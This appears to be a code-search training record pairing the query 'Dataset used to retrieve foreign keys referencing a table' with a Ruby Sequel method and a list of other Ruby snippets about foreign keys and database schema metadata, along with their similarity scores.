"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
"def foreign_keys\n vals = []\n foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_keys_from_associations(fields = association_fields)\n fields.each_with_object([]) do |(_field_name, metadata), keys|\n keys << metadata[:foreign_key] if metadata[:foreign_key]\n keys << metadata[:polymorphic_type] if metadata[:polymorphic_type]\n keys\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def find_relations\n sql = <<-eos\n SELECT\n tc.constraint_name, tc.table_name, kcu.column_name,\n ccu.table_name AS foreign_table_name,\n ccu.column_name AS foreign_column_name\n FROM\n information_schema.table_constraints AS tc\n JOIN information_schema.key_column_usage AS kcu ON tc.constraint_name = kcu.constraint_name\n JOIN information_schema.constraint_column_usage AS ccu ON ccu.constraint_name = tc.constraint_name\n WHERE constraint_type = 'FOREIGN KEY'\n eos\n @relations = @connection.exec(sql).values\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def tables_with_referential_integrity\n schemas_and_tables = select_rows <<-SQL.strip_heredoc\n SELECT s.name, o.name\n FROM sys.foreign_keys i\n INNER JOIN sys.objects o ON i.parent_object_id = o.OBJECT_ID\n INNER JOIN sys.schemas s ON o.schema_id = s.schema_id\n SQL\n schemas_and_tables.map do |schema_table|\n schema, table = schema_table\n \"#{SQLServer::Utils.quoted_raw(schema)}.#{SQLServer::Utils.quoted_raw(table)}\"\n end\n end",
"def foreign_key_fields\n keys = []\n database_field_names.each do |param|\n if self.send(param).is_a? ForeignKey\n keys << param\n end\n end\n keys\n end",
"def _reverse_foreign_key_list_ds\n @_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)\n end",
"def association_foreign_keys(assoc_record)\n association_foreign_keys_names.map { |name| assoc_record.public_send(name) }\n end",
"def associations_foreigns\n _reflections.map do |_, reflection|\n cols = [reflection.foreign_key]\n cols << reflection.foreign_type if reflection.polymorphic?\n cols\n end.flatten\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def dataset_key\n :id\n end",
"def foreign_key\n association.foreign_key \n end",
"def foreign_properties\n to_h.slice(*foreign_keys + foreign_objects)\n end",
"def hash_fk_model\n foreign_keys = {}\n @model_class.reflect_on_all_associations(:belongs_to).map{ |r|\n foreign_keys[r.association_foreign_key.to_sym] = r.name\n }\n foreign_keys\n end",
"def foreign_keys(*partition_key_values)\n return collect_from_collection(*partition_key_values, &:foreign_keys).inject(Set.new) do |set,new_items|\n if new_items.is_a? Array\n set += new_items\n else\n set += [new_items]\n end\n set\n end\n end",
"def excluded_foreign_key_names\r\n excluded_dimension_relations = prejoined_fields.keys.collect {|k| dimension_relationships[k]}\r\n excluded_dimension_relations.collect {|r| r.foreign_key}\r\n end",
"def references(current_table)\r\n references = []\r\n tables = get_tables\r\n tables.each do |table|\r\n columns = get_column_names(table)\r\n columns.each do |column|\r\n if /[_id]$/.match(column)\r\n references << table if column.split('_id').join == current_table\r\n end\r\n end\r\n end\r\n references\r\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def association_dataset_for(object)\n condition = if can_have_associated_objects?(object)\n predicate_keys.zip(predicate_key_values(object))\n else\n false\n end\n\n associated_dataset.where(condition)\n end",
"def link_belongs_to(reflection)\n reflection.foreign_key.to_sym\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def foreign_key\n association ? association.foreign_key : name\n end",
"def referenced_tables(tables)\n result = {}\n tables.each do |table|\n result[table] = []\n self.select_all(\"select reftabname from syscat.references where tabname = '#{table.upcase}'\").each do |row|\n result[table] << row['reftabname'].downcase\n end\n end\n result\n end",
"def index\n @foreign_keys = ForeignKey.all\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def fetch_reference_ids(table, row)\n attributes = {}\n table.reference_columns.each do |c|\n new_id = nil\n if row[c.name.to_s].is_a?(Array)\n new_id = []\n row[c.name.to_s].each do |old_id|\n new_id << no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, old_id)\n end\n else\n new_id = no_sql_connection.get_id_using_pre_mongified_id(c.references.to_s, row[c.name.to_s])\n end\n attributes.merge!(c.name => new_id) unless new_id.nil?\n end\n attributes\n end",
"def foreign_key\n self.name + \"_id\"\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def dataset\n database[table_name]\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def keys\n @table.keys.inject(@parent ? @parent.keys : []) do |res, k1|\n @table[k1].keys.inject(res) do |_res, k2|\n ref = make_reference(k1, k2)\n _res.include?(ref) ? _res : res << ref\n end\n end\n end",
"def _select_pk_ds\n @_select_pk_ds ||= metadata_dataset.\n from(:pg_class, :pg_attribute, :pg_index, :pg_namespace).\n where{[\n [pg_class[:oid], pg_attribute[:attrelid]],\n [pg_class[:relnamespace], pg_namespace[:oid]],\n [pg_class[:oid], pg_index[:indrelid]],\n [pg_index[:indkey].sql_subscript(0), pg_attribute[:attnum]],\n [pg_index[:indisprimary], 't']\n ]}.\n select{pg_attribute[:attname].as(:pk)}\n end",
"def datasets\n Dataset.order(:name).map_h {|d| DataRow.where(ward: self, dataset: d)}\n end",
"def essential_columns(model_class)\n model_class.reflect_on_all_associations.inject([@primary_key]) do |arr, assoc|\n if assoc.options[:dependent] && assoc.macro == :belongs_to\n arr << assoc.association_foreign_key\n end\n arr\n end\n end",
"def eager_loaded_ids(docs, metadata)\n if metadata.stores_foreign_key?\n docs.flat_map{ |doc| doc.send(metadata.foreign_key) }\n else\n docs.map(&:id)\n end\n end",
"def scaffold_foreign_key(reflection)\n get_key_array_safe(reflection.child_key).name\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def owner_key_name\n reflection.join_foreign_key\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
"def foreign_key_choices\n choices = []\n foreign_keys.each do |foreign_key|\n choices << foreign_key.all_from_class\n end\n choices\n end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def stores_foreign_key?; true; end",
"def reflection_to_foreign_keys!( reflection, foreign_key_list )\n reflection_to_foreign_keys( reflection ).each do |foreign_key|\n #skip if already in this list or the fk has already been uped in the db\n next if includes_foreign_key?( foreign_key, foreign_key_list ) ||\n existing_foreign_key?( foreign_key )\n foreign_key_list << foreign_key\n end\n end",
"def belongs_to_relations(ar_instance)\n\t\t\tcolumns = ar_instance.class.column_names\n\t\t\tparents = columns.map{ |c| c if c =~ /_id/ }.reject{ |c| c.nil? }\n\t\t\tparents.map!{ |parents| parents.gsub('_id', '') }\n\t\tend",
"def foreigns\n []\n end",
"def foreign_key\n @resource_options.fetch :foreign_key,\n :\"#{tools.string.singularize association_name}_id\"\n end",
"def fk_join_arr\n result = []\n groups.each_with_index do |group, idx|\n group_alias = \"#{group.parent_table}_#{idx}\"\n group_query = group_query_builder(group)\n result.push \"JOIN (\\n#{group_query}\\n\\t) AS #{group_alias}_fk\"\n result.push \"ON #{group_alias}_fk.#{FKEYS[group.parent_table]}=#{group.parent_table}.#{group.parent_table_pk}\"\n if idx > 0\n groups.each_with_index do |x_group, x_idx|\n #next if x_idx < idx\n x_group_alias = \"#{x_group.parent_table}_#{x_idx}\"\n result.push \"\\tAND #{x_group_alias}_fk.year = #{group_alias}_fk.year\"\n break\n end\n end\n end\n return result\n end",
"def foreign_key(*attributes)\n self.foreign_keys += attributes\n end",
"def related_data\n @resource.related_identifiers.where(verified: true).where(hidden: false).map do |ri|\n { relation: ri.relation_type_friendly&.camelize(:lower), identifier: ri.related_identifier }\n end || []\n end",
"def primary_key_and_all_references_to_uuid(table, seed: nil)\n fk_specs = foreign_keys_into(table)\n\n drop_foreign_keys(fk_specs)\n\n primary_key_to_uuid(table, seed: seed)\n\n fk_specs.each do |fk_spec|\n columns_to_uuid fk_spec[:from_table], fk_spec[:column], seed: seed\n end\n\n create_foreign_keys(fk_specs.deep_dup)\n end",
"def association_keys\n association\n .__send__(:join_key_map, container.relations)\n end",
"def has_many_relations(ar_instance)\n\t\t\tcolumn_name = \"#{ar_instance.class.name.underscore}_id\"\n\t\t\tdescendents = ActiveRecord::Base.connection.tables\n\t\t\tdescendents.reject!{ |table| false unless table.classify.constantize rescue true }\n\t\t\tdescendents.reject!{ |table| true unless table.classify.constantize.column_names.include?(column_name) }\n\t\tend",
"def relation_foreign_key(relation)\n relation_reflect(relation).foreign_key\n end",
"def sub_querier_keys()\n ret = @columnNames\n ret << :user_id\n ret << :milestone_id\n return ret\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def association_attributes\n outgoing_reflections.values.map { |reflection| reflection.foreign_key.to_s }\n end",
"def active_record_has_and_belongs_to_many(model, relation)\n return [] unless relation.macro == :has_and_belongs_to_many\n\n dump_proxy_table(model, relation)\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments[1].to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n if @foreign_keys[table_name].delete(\"#{$1}_type\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n elsif foreign_key_column =~ /(.*?)_type$/\n if @foreign_keys[table_name].delete(\"#{$1}_id\")\n @foreign_keys[table_name] << [\"#{$1}_id\", \"#{$1}_type\"]\n else\n @foreign_keys[table_name] << foreign_key_column\n end\n end\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def reverse_foreign_keys\n connection.reverse_foreign_keys(table_name, \"#{name} Reverse Foreign Keys\")\n end",
"def table_ref(t)\n case t\n when Dataset\n t.to_table_reference\n when Hash\n t.map {|k, v| \"#{table_ref(k)} #{table_ref(v)}\"}.join(COMMA_SEPARATOR)\n when Symbol\n symbol_to_column_ref(t)\n when String\n quote_identifier(t)\n else\n literal(t)\n end\n end",
"def associations\n association_ids = model.association_field_ids\n data.select{|k,v| association_ids.include?(k.to_s) }\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def keys\n @keys ||= [column_for_order_by(relation), primary_key].compact.uniq\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def preload_belongs_to(connection, records, relation, as:)\n belonging_column = relation.belonging_column.to_sym\n having_column = relation.having_column.to_sym\n\n foreign_ids = H.pluck(records, belonging_column).uniq.compact\n\n scope = connection.scope(table: relation.having_table)\n scope = scope.where(having_column => foreign_ids)\n\n recs = connection.all(scope, into: Hash)\n recs_by_id = H.by_key(recs, having_column)\n\n records.each do |model|\n model[as] = recs_by_id[model.fetch(belonging_column)]\n end\n end",
"def association_key\n table[association_key_name]\n end",
"def referenced_by\n values = super\n values = Deepblue::MetadataHelper.ordered( ordered_values: referenced_by_ordered, values: values )\n return values\n end",
"def foreign_key_for(association)\n model_instance[association.foreign_key_column_name]\n end",
"def remember_foreign_key_columns(node)\n table_name = @table_name\n foreign_key_column = node.arguments.all.first.to_s\n @foreign_keys[table_name] ||= []\n if foreign_key_column =~ /(.*?)_id$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_type\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = foreign_key_column\n elsif foreign_key_column =~ /(.*?)_type$/\n @foreign_keys[table_name] <<\n if @foreign_keys[table_name].delete(\"#{Regexp.last_match(1)}_id\")\n [\"#{Regexp.last_match(1)}_id\", \"#{Regexp.last_match(1)}_type\"]\n else\n foreign_key_column\n end\n foreign_id_column = \"#{Regexp.last_match(1)}_id\"\n end\n\n if foreign_id_column\n index_node = node.arguments.all.last.hash_value('index')\n if index_node.present? && (index_node.to_s != 'false')\n @index_columns[table_name] ||= []\n @index_columns[table_name] << foreign_id_column\n end\n end\n end",
"def primary_keys(table)\n pks = query(<<-end_sql, 'SCHEMA')\n SELECT DISTINCT attr.attname\n FROM pg_attribute attr\n INNER JOIN pg_depend dep ON attr.attrelid = dep.refobjid AND attr.attnum = dep.refobjsubid\n INNER JOIN pg_constraint cons ON attr.attrelid = cons.conrelid AND attr.attnum = any(cons.conkey)\n WHERE cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n pks.present? ? pks[0] : pks\n end",
"def build_id_constraint(reflection, keys, value, table = nil, bind_param = false)\n table ||= reflection.aliased_table\n value, binds = build_binds_for_constraint(reflection, value, keys.foreign_key) \\\n if bind_param\n\n [reflection.build_id_constraint(table[keys.key], value), binds]\n end",
"def children_table; end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def get_parent_relation_keys(parent)\n parents = Array(parent)\n\n reflect_on_all_associations.inject([]) do |result, relation|\n result << relation.foreign_key if parents.include?(relation.name)\n\n result\n end\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def hash_fk_model\n raise NotImplementedError\n end",
"def table\n association.table_name\n end",
"def extract_dbc_data\n tabledata = {}\n\n curt = nil\n @db.each do |r|\n unless r.nil?\n if r.objecttype == \"Table\"\n # This is a related table\n tabledata[r.objectid] = {name: r.objectname, fields: []}\n elsif r.objecttype == \"Field\"\n # This is a related field. The parentid points to the table object\n\n # create using the parentid if the parentid is still unknown.\n tabledata[r.parentid] = {name: \"UNKNOWN\", fields: []} unless tabledata.has_key?(r.parentid)\n tabledata[r.parentid][:fields] << r.objectname\n end\n end\n end\n\n # now we need to transform the resulting array-hash to a direct mapping (changed to support older Ruby versions)\n # { tablename => [fieldnames] }\n @tables = {}\n tabledata.each{|k, v| @tables[v[:name]] = v[:fields] }\n end",
"def combine_polymorphic_foreign_keys\n @index_columns.each do |_table, foreign_keys|\n foreign_id_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_id/ }\n foreign_type_keys = foreign_keys.select { |key| key.size == 1 && key.first =~ /_type/ }\n foreign_id_keys.each do |id_key|\n next unless type_key =\n foreign_type_keys.detect { |type_key| type_key.first == id_key.first.sub(/_id/, '') + '_type' }\n\n foreign_keys.delete(id_key)\n foreign_keys.delete(type_key)\n foreign_keys << id_key + type_key\n end\n end\n end",
"def non_foreign_key_values\n vals = []\n non_foreign_key_fields.each do |field|\n vals << self.send(field)\n end\n vals\n end",
"def scaf_foreign_key_name( assoc )\n assoc.primary_key_name\n end",
"def schema_ds_join(table_name, opts)\n [:information_schema__columns, {:table_catalog=>:table_catalog,\n :table_schema => :table_schema, :table_name => :table_name} , :c]\n end"
] |
[
"0.7179927",
"0.69182503",
"0.6904587",
"0.68861365",
"0.68154234",
"0.66139185",
"0.6553873",
"0.6553873",
"0.65525526",
"0.6544885",
"0.6445108",
"0.6381183",
"0.63455",
"0.63219166",
"0.6265057",
"0.62337005",
"0.62207776",
"0.61979944",
"0.6148675",
"0.6110326",
"0.60827583",
"0.60564655",
"0.6043439",
"0.6023383",
"0.6009314",
"0.59862787",
"0.59837306",
"0.5972757",
"0.58675766",
"0.5862392",
"0.5854458",
"0.58401364",
"0.5829467",
"0.582849",
"0.5794386",
"0.57919306",
"0.5790232",
"0.57799715",
"0.57634336",
"0.5743335",
"0.57425535",
"0.5731835",
"0.57281166",
"0.5695528",
"0.5685387",
"0.5674788",
"0.56739837",
"0.56635654",
"0.56635654",
"0.56616515",
"0.56373096",
"0.5631322",
"0.5624292",
"0.5619909",
"0.5615421",
"0.5607563",
"0.55935884",
"0.55833447",
"0.55681384",
"0.556693",
"0.5560387",
"0.5557153",
"0.555466",
"0.55297536",
"0.5529462",
"0.552525",
"0.5513466",
"0.5507957",
"0.549369",
"0.549133",
"0.5483819",
"0.5483819",
"0.54731864",
"0.54661566",
"0.54623175",
"0.5459045",
"0.54455847",
"0.5440195",
"0.5432439",
"0.54126704",
"0.5399339",
"0.5399339",
"0.5386515",
"0.5373706",
"0.53713787",
"0.536924",
"0.53689235",
"0.5367784",
"0.53553796",
"0.5354833",
"0.53332734",
"0.5331446",
"0.5328804",
"0.5328804",
"0.53238046",
"0.5321366",
"0.5309996",
"0.53029394",
"0.52959734",
"0.5295875"
] |
0.670528
|
5
|
Dataset used to retrieve foreign keys referencing a table
|
def _reverse_foreign_key_list_ds
@_reverse_foreign_key_list_ds ||= __foreign_key_list_ds(true)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n fks = ado_schema_foreign_keys(table).inject({}) do |memo, fk|\n name = m.call(fk['FK_NAME'])\n specs = memo[name] ||= {\n :columns => [],\n :table => m.call(fk['PK_TABLE_NAME']),\n :key => [],\n :deferrable => fk['DEFERRABILITY'],\n :name => name,\n :on_delete => fk['DELETE_RULE'],\n :on_update => fk['UPDATE_RULE']\n }\n specs[:columns] << m.call(fk['FK_COLUMN_NAME'])\n specs[:key] << m.call(fk['PK_COLUMN_NAME'])\n memo\n end\n fks.values\n end",
